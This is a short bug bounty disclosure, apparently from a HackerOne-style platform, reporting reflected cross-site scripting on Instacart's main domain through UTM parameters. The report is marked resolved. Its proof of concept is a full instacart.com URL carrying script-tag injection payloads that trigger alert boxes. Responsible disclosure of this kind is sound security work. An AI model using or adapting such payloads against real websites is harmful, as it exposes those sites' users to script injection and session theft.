Cross-Site Scripting Reflected On Main Domain
I
Instacart
Submitted None
Actions:
Reported by
hussain_0x3c
Vulnerability Details
Technical details and impact analysis
**Hi** Security Team instacart
I'm Found Have Vulnerability Cross-Site Scripting Reflected on Main Domain in Variable **utm_source**
POC
---
https://www.instacart.com/green-zebra-grocery?utm_source=>"'><script>alert(/Hussain/)</script>&utm_medium=>"'><script>alert(/XSS/)</script>&utm_campaign=>"'><script>alert(/injection/)</script>
**Img** :- http://i.imgur.com/wSn4EU7.jpg
Test :- FF - IE
**Regards**
@Hussain
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Generic